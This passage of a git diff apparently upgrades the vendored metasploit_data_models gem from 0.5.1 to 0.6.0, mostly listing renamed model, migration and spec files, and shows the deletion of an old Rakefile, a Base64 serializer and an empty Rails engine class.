metasploit_data_models-0.6.0}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_author.rb 
(100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 
metasploit_data_models-0.6.0}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/user.rb (87%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_site.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/web_vuln.rb (72%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 
metasploit_data_models-0.6.0}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/console_db.yml (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/000_create_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/001_add_wmap_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/002_add_workspaces.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/003_move_notes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/004_add_events_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/005_expand_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/006_add_timestamps.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/007_add_loots.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/008_create_users.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/009_add_loots_ctype.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/010_add_alert_fields.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/011_add_reports.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/012_add_tasks.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/013_add_tasks_result.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/014_add_loots_fields.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/015_rename_user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/016_add_host_purpose.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/017_expand_info2.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/018_add_workspace_user_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/019_add_workspace_desc.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/020_add_user_preferences.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/021_standardize_info_and_data.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/022_enlarge_event_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/023_add_report_downloaded_at.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/024_convert_service_info_to_text.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/025_add_user_admin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/026_add_creds_table.rb (100%) 
rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100819123300_migrate_cred_data.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100824151500_add_exploited_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100908001428_add_owner_to_workspaces.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100911122000_add_report_templates.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100916151530_require_admin_flag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100916175000_add_campaigns_and_templates.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100920012100_add_generate_exe_column.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20100926214000_add_template_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101001000000_add_web_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101002000000_add_query.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101007000000_add_vuln_info.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101008111800_add_clients_to_campaigns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 
metasploit_data_models-0.6.0}/db/migrate/20101009023300_add_campaign_attachments.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101104135100_add_imported_creds.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101203000000_fix_web_tables.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101203000001_expand_host_comment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110112154300_add_module_uuid_to_tasks.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110204112800_add_host_tags.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110317144932_add_session_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110414180600_add_local_id_to_session_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110415175705_add_routes_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110422000000_convert_binary.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110425095900_add_last_seen_to_sessions.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110513143900_track_successful_exploits.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110527000000_add_task_id_to_reports_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110527000001_add_api_keys_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110606000001_add_macros_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110622000000_add_settings_to_tasks_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110624000001_add_listeners_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110625000001_add_macro_to_listeners_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110630000001_add_nexpose_consoles_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110717000001_add_profiles_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110727163801_expand_cred_ptype_column.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110730000001_add_initial_indexes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 
metasploit_data_models-0.6.0}/db/migrate/20110812000001_prune_indexes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110922000000_expand_notes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20110928101300_add_mod_ref_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111011110000_add_display_name_to_reports_table.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111203000000_inet_columns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111204000000_more_inet_columns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20111210000000_add_scope_to_hosts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120126110000_add_virtual_host_to_hosts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120411173220_rename_workspace_members.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120601152442_add_counter_caches_to_hosts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000000_add_vuln_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000001_add_host_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000002_expand_details.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000003_expand_details2.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000004_add_vuln_attempts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000006_add_module_details.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000007_add_exploit_attempts.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120625000008_add_fail_message.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 
metasploit_data_models-0.6.0}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/metasploit_data_models/version.rb (96%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/lib/tasks/yard.rake (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/metasploit_data_models.gemspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/app/models/mdm/web_vuln_spec.rb (80%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/helpers/application_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/mailers/.gitkeep (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 
metasploit_data_models-0.6.0}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/config/routes.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/db/schema.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/dummy/script/rails (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb create mode 100644 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/spec/spec_helper.rb (66%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.5.1.gemspec => metasploit_data_models-0.6.0.gemspec} (97%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile deleted file mode 100755 index b582299d61..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/env rake -begin - require 'bundler/setup' -rescue LoadError - puts 'You must `gem install bundler` and `bundle install` to run rake tasks' -end - - -APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) -load 'rails/tasks/engine.rake' - -Bundler::GemHelper.install_tasks - -require 'rspec/core/rake_task' - -RSpec::Core::RakeTask.new(:spec) -task :default => :spec - -load 'lib/tasks/yard.rake' - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb deleted file mode 100755 index b209aa39cc..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb +++ /dev/null 
@@ -1,35 +0,0 @@ -# 2012-04-23 -# -# Provides ActiveRecord 3.1x-friendly serialization for descendants of -# ActiveRecord::Base. Backwards compatible with older YAML methods and -# will fall back to string decoding in the worst case -# -# usage: -# serialize :foo, MetasploitDataModels::Base64Serializer.new -# -module MetasploitDataModels - class Base64Serializer - def load(value) - return {} if value.blank? - begin - # Load the unpacked Marshal object first - Marshal.load(value.unpack('m').first) - rescue - begin - # Support legacy YAML encoding for existing data - YAML.load(value) - rescue - # Fall back to string decoding - value - end - end - end - - def dump(value) - # Always store data back in the Marshal format - [ Marshal.dump(value) ].pack('m') - end - end -end - - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb deleted file mode 100644 index 27f7df2994..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb +++ /dev/null @@ -1,7 +0,0 @@ -require 'rails' - -module MetasploitDataModels - class Engine < Rails::Engine - - end -end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb deleted file mode 100755 index ace44fcdac..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb +++ /dev/null 
